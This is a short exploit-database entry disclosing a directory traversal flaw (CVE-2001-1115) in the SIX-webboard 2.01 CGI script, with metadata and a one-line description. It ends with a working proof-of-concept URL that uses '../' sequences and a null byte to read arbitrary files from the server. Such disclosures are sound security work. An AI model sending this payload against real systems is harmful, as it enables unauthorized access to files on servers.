SIX-webboard 2.01 - File Retrieval

Author: Hannibal Lector
type: remote
platform: cgi
port: 
date_added: 2001-08-31 
date_updated: 2012-09-04 
verified: 1 
codes: CVE-2001-1115;OSVDB-603 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/3175/info

SIX-webboard 2.01 does not filter ".." and "/" from user input, allowing users to enter arbitrary values in order to view or retrieve files not normally accessible to them from the remote host.

http://www.target.com/cgi-bin/webboard/generate.cgi/?content=../../../../../../../../../directory/file%00&board=boardsname